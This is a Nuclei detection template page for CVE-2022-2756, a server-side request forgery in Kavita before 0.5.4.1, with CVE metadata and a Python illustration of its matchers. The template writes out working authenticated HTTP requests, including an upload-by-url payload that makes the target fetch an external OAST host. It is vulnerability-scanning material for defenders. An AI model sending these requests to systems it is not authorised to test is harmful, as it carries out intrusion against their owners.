Kavita <0.5.4.1 - Server-Side Request Forgery
ID: CVE-2022-2756
Severity: medium
Author: theamanrawat
Tags: cve,cve2022,ssrf,kavita,authenticated,huntr,intrusive,kavitareader
Description
Kavita before 0.5.4.1 is susceptible to server-side request forgery in GitHub repository kareadita/kavita. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
YAML Source
```yaml
id: CVE-2022-2756

info:
  name: Kavita <0.5.4.1 - Server-Side Request Forgery
  author: theamanrawat
  severity: medium
  description: |
    Kavita before 0.5.4.1 is susceptible to server-side request forgery in GitHub repository kareadita/kavita. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further attacks.
  remediation: Fixed in 0.5.4.1.
  reference:
    - https://huntr.dev/bounties/95e7c181-9d80-4428-aebf-687ac55a9216/
    - https://github.com/kareadita/kavita
    - https://github.com/kareadita/kavita/commit/9c31f7e7c81b919923cb2e3857439ec0d16243e4
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2756
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-2756
    cwe-id: CWE-918
    epss-score: 0.01579
    epss-percentile: 0.87037
    cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: kavitareader
    product: kavita
    shodan-query:
      - title:"kavita"
      - http.title:"kavita"
    fofa-query: title="kavita"
    google-query: intitle:"kavita"
  tags: cve,cve2022,ssrf,kavita,authenticated,huntr,intrusive,kavitareader

http:
  - raw:
      - |
        POST /api/account/login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}
      - |
        POST /api/upload/upload-by-url HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Authorization: Bearer {{token}}
        Content-Type: application/json

        {"url":"http://oast.me/#.png"}
      - |
        GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - Interactsh Server

      - type: word
        part: header
        words:
          - image/png

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - '"token":"(.*?)"'
        internal: true

      - type: regex
        name: filename
        group: 1
        regex:
          - coverupload.(.*?).png
        internal: true
# digest: 4b0a00483046022100dfa862ed7c2fd3b3556bbbc415ee02f8c6ee4b6b50e26a80d302d19b7219a2160221008275f57ca980de7a866b59c1ddb7bd4b461838f00eb22713c66231a1d73b60f2:922c64590222798bb761d5b6d8e72950
```
Guide to check the vulnerabilities
This template detects CVE-2022-2756 with the Nuclei scanner. It is tagged authenticated and intrusive: it needs valid Kavita credentials supplied through the {{username}} and {{password}} variables, performs a real upload-by-url request on the target, and reports a finding only when the stored cover image comes back as the OAST server's page with an image/png content type.
```shell
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-2756.yaml"
```
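The template chains its three requests through the two internal extractors and then applies three matchers with matchers-condition and. The Python below is an added illustration, not part of the Nuclei template or of Kavita: it evaluates those same extractors and matchers over constructed sample responses (not real Kavita output) so a defender can see exactly which observable conditions count as a positive result. It assumes that unindexed matcher parts (header, status) refer to the last response.

```python
import re
# Constructed sample responses (not real Kavita output), one per raw request in
# the template: login, upload-by-url, then fetching the stored "cover" image.
VULNERABLE_RESPONSES = [
    {"status": 200, "headers": {"Content-Type": "application/json"},
     "body": '{"username":"reader","token":"eyJhbGciOi.example.sig"}'},
    {"status": 200, "headers": {"Content-Type": "application/json"},
     "body": '"coverupload_3f2a9b.png"'},
    # The server fetched the supplied URL itself and now serves what it got back.
    {"status": 200, "headers": {"Content-Type": "image/png"},
     "body": "<html><body><h1>Interactsh Server</h1></body></html>"},
]
# Extractors and matchers transcribed from the template above.
EXTRACTORS = [
    {"name": "token", "regex": r'"token":"(.*?)"', "group": 1},
    {"name": "filename", "regex": r"coverupload.(.*?).png", "group": 1},
]
MATCHERS = [
    {"type": "word", "part": "body_3", "words": ["Interactsh Server"]},
    {"type": "word", "part": "header", "words": ["image/png"]},
    {"type": "status", "status": [200]},
]

def extract(responses, extractors=EXTRACTORS):
    """First regex hit across the responses supplies {{token}} / {{filename}}."""
    found = {}
    for ex in extractors:
        for resp in responses:
            m = re.search(ex["regex"], resp["body"])
            if m:
                found[ex["name"]] = m.group(ex["group"])
                break
    return found

def matches(responses, matchers=MATCHERS):
    """matchers-condition: and; unindexed parts are assumed to mean the last response."""
    last = responses[-1]
    for m in matchers:
        if m["type"] == "status":
            ok = last["status"] in m["status"]
        elif m["part"].startswith("body_"):
            idx = int(m["part"].split("_", 1)[1]) - 1
            ok = any(w in responses[idx]["body"] for w in m["words"])
        else:  # part: header; a word matcher's words default to an "or" condition
            hdrs = "\n".join(f"{k}: {v}" for k, v in last["headers"].items())
            ok = any(w in hdrs for w in m["words"])
        if not ok:
            return False
    return True
```

A server that serves the stored upload with a 200 and image/png but not the OAST page, or that refuses the upload-by-url request, fails the and condition and produces no finding.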